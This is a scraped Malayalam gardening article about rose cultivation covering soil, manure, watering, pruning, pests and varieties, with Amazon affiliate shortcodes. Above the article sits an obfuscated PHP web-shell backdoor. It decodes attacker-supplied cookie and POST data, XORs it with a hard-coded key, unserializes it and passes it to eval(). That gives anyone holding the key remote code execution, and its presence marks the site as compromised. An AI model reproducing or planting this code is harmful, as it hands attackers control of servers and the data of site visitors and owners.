$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} സുഗന്ധവും ഇതളുകള്‍ക്കു ഹൃദ്യമായ രൂപഭംഗിയുമുള്ള പനിനീര്‍ സൗന്ദര്യത്തിന്റെ പര്യായം – Mannira

സുഗന്ധവും ഇതളുകള്‍ക്കു ഹൃദ്യമായ രൂപഭംഗിയുമുള്ള പനിനീര്‍ സൗന്ദര്യത്തിന്റെ പര്യായം

പനിനീര്‍ പൂവിനോളം മനോഹരം എന്ന് സൗന്ദര്യമുള്ള ഏത് വസ്തുക്കളെയും നാം ഉപമിക്കാന്‍ ശ്രമിക്കാറുണ്ട്, പുഷ്പ്പങ്ങളില്‍ അത്രമനോഹരമായ ഒന്നാണ് റോസ് വിളിക്കപ്പെടുന്ന പനിനീര്‍പൂവ്. ലോകത്തില്‍ തന്നെ വാണിജ്യാടിസ്ഥാനത്തില്‍ ഏറ്റവും കൂടുതല്‍ ഉപയോഗിക്കുന്ന ഒരു പുഷ്പ്പമാണ് പനിനീര്‍. ഒട്ടുമിക്ക ആഘോഷവേളകളെയും ഈ പൂക്കളുടെ സാന്നിധ്യം കൊണ്ട് മനോഹരമാക്കപ്പെടാറുണ്ട്. വ്യത്യസ്ത നിറത്തിലും വലിപ്പത്തിലും പൂക്കള്‍ വിരിയുന്ന ഈ ചെടിയുടെ ജന്മദേശം ഏഷ്യയാണ്. ഇംഗ്ലണ്ട്, അമേരിക്കന്‍ ഐക്യനാടുകള്‍ എന്നീ രാജ്യങ്ങളുടെ ദേശീയപുഷ്പവുമാണ് റോസ്. പൂക്കളുടെ സുഗന്ധവും ഇതളുകള്‍ക്കു ഹൃദ്യമായ രൂപഭംഗിയുമാണ് റോസിനെ മറ്റു പൂക്കളില്‍ നിന്ന് വ്യത്യസ്തയാക്കുന്നത്. പൂവിതളില്‍ നിന്നും ഹൃദ്യമായ സുഗന്ധമുള്ള പനിനീര്‍ വേര്‍തിരിച്ചെടുക്കാന്‍ കഴിയുന്നതുകൊണ്ടാണ് ഈ ചെടി പനിനീര്‍ച്ചെടി എന്നറിയപ്പെടുന്നു.

ഏകദേശം 25,000 പരം ഇനങ്ങളിലുള്ള പനിനീര്‍ച്ചെടികള്‍ ലോകത്തിന്റെ വിവിധഭാഗങ്ങളില്‍ കാണപ്പെടുന്നുണ്ട്. തമിഴ്‌നാട്ടിലെ ഊട്ടിയിലെ റോസ് ഗാര്‍ഡനില്‍ 5,000 ത്തോളം ഇനത്തില്‍ പെട്ട റോസ് ചെടുകളുണ്ട്. നിറം, വലിപ്പം, ആകൃതി, ഗന്ധം എന്നിവ അടിസ്ഥാനമാക്കി പ്രധാനമായും അഞ്ചായി ചെടികള്‍ വിഭജിച്ചിട്ടുണ്ട്. വ്യാവസായിക അടിസ്ഥാനത്തിലും അലങ്കാരത്തിനായും വളര്‍ത്താന്‍ കഴിയുന്ന ഒരു ചെടികൂടിയാണ് പനിനീര്‍. റോസാസിയെ (Rosaceae) എന്ന കുടുംബനാമത്തില്‍ അടിയപ്പെടുന്ന ഈ ചെടിയുടെ ശാസ്ത്രീയ നാമം റോസ് റുബിജിനോസ (Rose rubiginosa) എന്നാണ്.

[amazon_link asins='B0756RCV54' template='ProductAd' store='Mannira3765' marketplace='IN' link_id='06f20b58-30e5-11e8-8306-f173d8bcb7b8']

അലങ്കാര ആവശ്യത്തിനും സുഗന്ധദ്രവ്യങ്ങളുടെ ഉത്പാദനത്തിനുമായാണ് പ്രധാനമായും റോസ് ഉപയോഗിക്കുന്നത്. എന്നാല്‍ ഇന്ത്യ, ചൈന പോലെയുള്ള പല രാജ്യങ്ങളുടെയും പാരമ്പര്യ ചികിത്സാരീതികളില്‍ റോസ് ഇതളുകള്‍ ഉപയോഗിക്കാറുണ്ട്. റോസ് ഇതളുകള്‍ ചില പ്രത്യേക രീതിയില്‍ സംസ്‌ക്കരിച്ചെടുത്താണ് പെര്‍ഫ്യൂം നിര്‍മ്മാണത്തിനായി ഉപയോഗിക്കുന്നത്. ഈ നിര്‍മ്മാണവിദ്യ കണ്ടെത്തിയത് പേര്‍ഷ്യയിലാണെന്ന് കരുതപ്പെടുന്നു. തുടര്‍ന്ന് ഇതു അറേബ്യ, ഇന്ത്യ, കിഴക്കേ യൂറോപ്പ് എന്നിവിടങ്ങളിലേക്ക് വ്യാപിച്ചു.

നിലവില്‍ അവലംബിക്കാന്‍ കഴിയുന്ന വാണിജ്യമൂല്യമുള്ള കൃഷിയാണ് അലങ്കാര പുഷ്പ്പക്കൃഷി. കാരണം, അന്തര്‍ദേശീയതലത്തില്‍ പോലും വിപണി കണ്ടെത്താന്‍ കഴിയുന്നു എന്നതാണ്. റോസ് വാണിജ്യപരതയോടെ കൃഷി ചെയ്യാന്‍ ആരംഭിക്കുന്നതിനു മുന്‍പ് കൃഷി ചെയ്യാന്‍ ഉദ്ദേശിക്കുന്ന പ്രദേശത്തിനും കാലാവസ്ഥയ്ക്കും അനുയോജ്യമായ ഇനങ്ങള്‍ തെരഞ്ഞെടുക്കാന്‍ പ്രത്യേകം ശ്രദ്ധിക്കണം. ചട്ടികള്‍, ടെറസ്സ്, തുറസായ പ്രദേശം, പൊളിഹൗസ്, ഗ്രീന്‍ ഹൗസ് തുടങ്ങിയ വ്യത്യസ്ഥ മാതൃകകളില്‍ കൃഷി ചെയ്യാം. ഗ്രീന്‍ ഹൗസിന്റെ സംരക്ഷിത പരിസ്ഥിതിയില്‍ വളരുന്ന സസ്യങ്ങള്‍ക്കാണ് വിപണിമൂല്യം കൂടുതല്‍. റോസ് ചെടികള്‍ പ്രധാനമായും മൂന്നു തരത്തിലാണ് ഉള്ളത്. കുറ്റി റോസ്, പൊക്കം കുറഞ്ഞ റോസ്, പടര്‍ന്നു വളരുന്ന റോസ് എന്നിവയാണ് അവ.

കൃഷിരീതി

PH മൂല്യം 6 - 7 .5 ന് ഇടയിലുള്ള വളക്കൂറുള്ള മണല്‍ മണ്ണാണ് റോസ് ചെടിയുടെ കൃഷിക്ക് ഏറ്റവും അനുയോജ്യം.15-25 ഡിഗ്രി താപനിലയും ദിവസത്തില്‍ അഞ്ചോ ആറുമണിക്കൂര്‍ തുടര്‍ച്ചയായി ലഭിക്കുന്ന സൂര്യപ്രകാശവും ചെടികളുടെ വളര്‍ച്ചക്ക് ആവശ്യമാണ്. സൂര്യപ്രകാശം നേരിട്ട് ലഭിക്കുന്ന സ്ഥലങ്ങളില്‍ ചെടി നല്ലതുപോലെ വളരും. കൂടാതെ നീര്‍ വാഴ്ചയുള്ള സ്ഥലവും ആയിരിക്കണം ചെടി നടുന്നതിനായി തിരഞ്ഞെടുക്കേണ്ടത്. ഒക്ടോബര്‍ മാസം മുതല്‍ ഡിസംബര്‍ മാസം വരെ ചെടികള്‍ നടുന്നതിന് അനുയോജ്യമായ സമയമാണ്.

ചെറിയ ചട്ടികളിലോ പോളിത്തീന്‍ കവറിലോ നട്ട് കിളിര്‍പ്പിച്ച തൈകളാണ് ഇങ്ങനെ നടുന്നതിന് അനുയോജ്യം. 60 സെന്റീമീറ്റര്‍ മുതല്‍ 80 സെന്റീമീറ്റര്‍ വരെ ഇടയകലം ഇട്ട്, 60 സെ.മീ. നീളവും വീതിയും ആഴവും ഉള്ള കുഴികളില്‍ ചെടികള്‍ നടാവുന്നതാണ്. കുഴികളില്‍ മേല്‍മണ്ണും 4കിലോ മുതല്‍ 8 കിലോ വരെ ഉണക്കിപ്പൊടിച്ച ചാണകവും ഏകദേശം 100 ഗ്രാം എല്ലുപൊടിയും ചേര്‍ത്ത് കൂട്ടിയോജിപ്പിച്ച് കുഴികള്‍ നിറയ്ക്കുക. തൈകള്‍ വേരുകള്‍ പൊട്ടാതെ ഇളക്കിയെടുത്ത് ഇങ്ങനെ നിറച്ച കുഴികളില്‍ നടുക. ബഡ് ചെയ്ത് കിളിര്‍പ്പിച്ച തൈകള്‍ മുകുളം മണ്ണിനു മുകളില്‍ വരത്തക്കവണ്ണമാണ് നടുന്നത്. നട്ടതിനുശേഷം നല്ലതുപോലെ നനയ്ക്കുക.

[amazon_link asins='B077RV8CCY' template='ProductAd' store='Mannira3765' marketplace='IN' link_id='0ed8bfdd-30e5-11e8-bf7a-c5ba27c5cf2f']

വളപ്രയോഗം

കൃത്യമായും വളപ്രയോഗം ആവശ്യമുള്ള ചെടിയാണ് ഇത്. ആദ്യത്തെ പൂവ് വിരിയുന്നതുവരെ 2 കിലോഗ്രാം മുതല്‍ 5 കിലോഗ്രാം വരെ അളവില്‍ ചാണകമോ കമ്പോസ്‌റ്റോ നല്‍കേണ്ടതാണ്. ആദ്യത്തെ പൂവ് വിരിഞ്ഞുകഴിയുമ്പോള്‍ 50 ഗ്രാം കടലപ്പിണ്ണാക്ക് ചെടികള്‍ക്ക് നല്‍കാം. രണ്ടോ മൂന്നോ കിലോഗ്രാം പച്ചച്ചാണകമോ നിലക്കടലപ്പിണ്ണാക്കോ 4 ദിവസം മുതല്‍ 7 ദിവസം വരെ 5ലിറ്റര്‍ പച്ചവെള്ളത്തില്‍ ഇട്ടുകലക്കിയെടുന്ന ലായനി ഒരുചെടിക്ക് അരലിറ്റര്‍ എന്ന് തോതില്‍ വെള്ളത്തില്‍ നേര്‍പ്പിച്ച് നല്‍കേണ്ടതാണ്. ഇത്തരം വളപ്രയോഗങ്ങള്‍ കഴിഞ്ഞാല്‍ ചെടികള്‍ നന്നായി നനച്ചുകൊടുക്കേണ്ടതും അത്യാവശ്യം.

ജലസേചനം

പ്രധാന കൃഷിയിടത്തിലേക്ക് പറിച്ചു നട്ടതിനു ശേഷം ഉടന്‍തന്നെ ജലസേചനം ആരംഭിക്കണം. ചെടി വേരുപിടിക്കുന്നതു വരെ രണ്ടു ദിവസത്തില്‍ ഒരു തവണ എന്ന നിലയില്‍  നനക്കണം. തുടര്‍ന്ന് ആഴ്ചയില്‍ ഒരു തവണ എന്ന നിലയിലേക്ക് ചുരുക്കം. ചെടികളുടെ ചുവട്ടില്‍ അധികം ജലം കെട്ടി നില്ക്കാന്‍ പാടില്ലാത്ത തരത്തില്‍ വേണം ഇതിനായി നിലം ഒരുക്കാന്‍.

പരിചരണം

ഒക്ടോബര്‍ ഡിസംബര്‍ മാസങ്ങളില്‍ കൊമ്പുകോതല്‍ നടത്തിയാല്‍ കൂടുതല്‍ പൂക്കള്‍ ലഭിക്കും. ഉണങ്ങിയതും രോഗങ്ങള്‍ ബാധിച്ചതും ശക്തികുറഞ്ഞതുമായ തണ്ടുകള്‍ മുറിച്ചുമാറ്റേണ്ടതാണ്. നിലത്തുനിന്നും 25 സെന്റീ മീറ്റര്‍ മുകളില്‍ വച്ച് മുറിക്കുക. മുറിക്കുമ്പോള്‍ ആരോഗ്യമുള്ള മുകുളങ്ങളുടെ 1സെന്റീ മുതല്‍ 1.5 സെന്റീമീറ്റര്‍ വരെ മുകളിലായി ചരിച്ചാണ് മുറിക്കേണ്ടത്

കീടരോഗശല്യം

ചൂര്‍ണ്ണ പൂപ്പല്‍ രോഗം ചെടികളുടെ തളിരിലകളില്‍ ഉണ്ടാകുന്ന ഫംഗസ് ബാധയാണിത്. ആരംഭകാലങ്ങളില്‍ തളിരിലകള്‍ അകത്തേക്ക് ചുരുണ്ടുവരുന്നതാണ് ഇതിന്റെ പ്രധാന ലക്ഷണം. രോഗത്തിന്റെ തീവ്രതയനുസരിച്ച് ഇലകളിലും തണ്ടുകളിലും പൂപ്പല്‍ പോലെ ചാരനിറത്തിലുള്ള പാടുകള്‍ ഉണ്ടാകുന്നു. രോഗം നിയന്ത്രിക്കുന്നതിനായി രോഗം ബാധിച്ച കൊമ്പുകള്‍ മുറിച്ചുമാറ്റേണ്ടതാണ്. സള്‍ഫെക്‌സ്, കെരാത്തേന്‍എന്നീ രാസകീടനാശിനികള്‍ 1.5 ഗ്രാം മുതല്‍ 5 ഗ്രാം വരെ ഒരു ലിറ്റര്‍ വെള്ളത്തില്‍ കലക്കി സ്‌പ്രേ ചെയ്യേണ്ടത് നന്നായിരിക്കും. കരിമ്പൊട്ട് രോഗം ഇലകളിലുണ്ടാകുന്ന കറുത്ത പുള്ളികള്‍/അടയാളങ്ങള്‍ എന്നിവയാണ് രോഗം തിരിച്ചറിയുന്നതിനുള്ള ഏറ്റവും എളുപ്പമാര്‍ഗ്ഗം. കീടബാധയേറ്റ ഇലകള്‍ കാലക്രമേണ കൊഴിഞ്ഞുപോകാറുണ്ട്. ഡൈത്തേണ്‍എം എന്ന രാസകീടനാശിനി 45.2 ഗ്രാം 1 ലിറ്റര്‍ വെള്ളത്തില്‍ കലര്‍ത്തി ചെടികളില്‍ സ്‌പ്രേ ചെയ്യുന്നത് ഈ രോഗം നിയന്ത്രിക്കുന്നതിന് സഹായകമാണ്. മണ്ടയുണങ്ങല്‍ ചെടിയില്‍ മുകളില്‍ നിന്നും താഴേക്ക് കമ്പുകള്‍ ഉണങ്ങി നശിക്കുന്നതാണ് രോഗലക്ഷണം. ഉണങ്ങി കമ്പുകള്‍ മുറിച്ചുമാറ്റി മുറിവായില്‍ ബോര്‍ഡോ മിശ്രിതം പുരട്ടേണ്ടതാണ്. തുരുമ്പ് രോഗം ഇലകളിലും തണ്ടുകളിലും തുരുമ്പെടുത്ത അടയാളങ്ങളാണ് പ്രധാന രോഗ ലക്ഷണം. രോഗലക്ഷണങ്ങള്‍ കാണിക്കുമ്പോള്‍ ഡൈത്തേണ്‍ (2.78)ഗ്രാം, അല്ലെങ്കില്‍ സള്‍ഫ്‌ഗെക്‌സ് (2 ഗ്രാം) എന്നീ രാസകീടനാശിനികള്‍ 1 ലിറ്റര്‍ വെള്ളത്തില്‍ നേര്‍പ്പിച്ച് ചെടികളില്‍ തളിക്കുന്നത് നല്ലതാണ്. ശല്‍ക്ക കീടം ചെടികളെ നശിപ്പിക്കുന്ന പ്രധാന കീടമാണ് ശല്‍ക്കകീടങ്ങള്‍. ശല്‍ക്കരൂപത്തില്‍ മെഴുകിനെപ്പോലെ ചെടികളില്‍ പറ്റിപ്പിടിച്ചിരിക്കുന്ന ഈ കീടങ്ങള്‍ തണ്ടില്‍ നിന്നും ചെടിയുടെ നീരൂറ്റിക്കുടിക്കുന്നതിനാല്‍ ചെടികള്‍ ഉണങ്ങി നശിക്കുന്നു. എണ്ണത്തില്‍ കുറവാണെങ്കില്‍ കൈകൊണ്ട് നശിപ്പിക്കാവുന്നതാണ്. റോഗര്‍, നുവാക്രോണ്‍ എന്നീ രാസകീടനാശിനികള്‍ 12 മില്ലീ ലിറ്റര്‍ അളവില്‍ 1 ലിറ്റര്‍ വെള്ളത്തില്‍ കലര്‍ത്തി സ്‌പ്രേ ചെയ്യുന്നത് ഈ കീടങ്ങളെ നശിപ്പിക്കുന്നതിന് നല്ലതാണ്. വണ്ടുകള്‍ പൂക്കള്‍, ഇലകള്‍, തണ്ട്, വേര് എന്നീ ഭാഗങ്ങളില്‍ ആക്രമിക്കുന്ന കീടമാണ് ചാഫര്‍ വണ്ടുകള്‍. പകല്‍നേരങ്ങളില്‍ ഈ വണ്ടുകളെ കാണാന്‍ സാധിക്കുന്നില്ല.ഈ കീടങ്ങള്‍ ഇലയുടെ ഭാഗങ്ങള്‍ ചന്ദ്രാകൃതിയില്‍  നശിപ്പിക്കുന്നതുമൂലം ചെടികളും നശിക്കുന്നു. ഇതിനെതിരെ ബി.എച്ച്.സി 5% എന്ന രാസകീടനാശിനി 15 ഗ്രാം വരെ വിതറുകയാണ് ചെയ്യുന്നത്

ഇനങ്ങള്‍

  1. ഹൈബ്രിഡ്
    സുഗന്ധത്തിലും വലിപ്പത്തിലും മികച്ച ഇനങ്ങളായ ജവാഹര്‍, പൂര്‍ണ്ണിമ, ,ഷോഗേള്‍, സുപ്രീയ, ബ്ലാക്ക് ബ്യൂട്ടി, ബ്ലൂമൂണ്‍ എന്നിവയില്‍ പൂക്കള്‍ ഒറ്റയായിട്ടാണ് ഉണ്ടാകുന്നത്.
  2. ഫ്‌ലോറിബന്‍ഡ
    വലിപ്പം കൂടുതലായ ഈ വിഭാഗത്തിലെ ചെടികളില്‍ പൂക്കള്‍ കുലകളായി ഉണ്ടാകുന്നു. കൂടാതെ സുഗന്ധവും കുറവാണ്. ഫ്രഞ്ച് ലേസ്, െ്രെബഡല്‍ പിങ്ക്, മേഴ്‌സിഡസ്, ഏഞ്ചല്‍ ഫേസ്, ഫന്റാസിയ, ഗിതാര്‍ എന്നിവയാണ് പ്രധാന ഇനങ്ങള്‍.
  3. പോളിയാന്ത
    ധാരാളം പൂക്കള്‍ ഉണ്ടാകുന്ന ഈ ചെടികള്‍ക്ക് ഉയരം കുറവാണ്. എക്കോ, നര്‍ത്തകി, രശ്മി ഐഡിയന്‍, ഡാര്‍ക്ക് ബ്യൂട്ടി എന്നിവയാണ് പ്രധാന ഇനങ്ങള്‍
  4. മിനിയേച്ചേഴ്‌സ്
    തണ്ടുകള്‍, പൂക്കള്‍, ഇലകള്‍ എന്നിവ ചെറുതായുള്ള ഈ ഇനത്തിലെ ചെടികള്‍ ഒരടിയില്‍ കൂടുതല്‍ പൊക്കത്തില്‍ വളരാറില്ല. ചന്ദ്രിക, സിന്‍ഡ്രല്ല, സമ്മര്‍ബട്ടര്‍, റ്റീപാര്‍ട്ടി, ടോപ്പ് സീക്രട്ട് യല്ലോ ഡോള്‍ എന്നിവയാണ് ഈ ഇനത്തിലെ പ്രധാന ചെടികള്‍
  5. ക്ലൈംബേഴ്‌സ്
    പടര്‍ന്നു പിടിക്കുന്ന ഇനത്തിലെ ചെടികള്‍ ആണിവ. ക്ലൈംബിംഗ് പീസ്, കോക്ക് ടെയില്‍, ക്ലൈംബിംഗ് പാരഡൈസ് എന്നിവയാണ് പ്രധാന ചെടികള്‍

Also Read: ഇലക്കറി വിളകളിലെ പുതുമുഖമായ ഗാർളിക് ചൈവിനെ പരിചയപ്പെടാം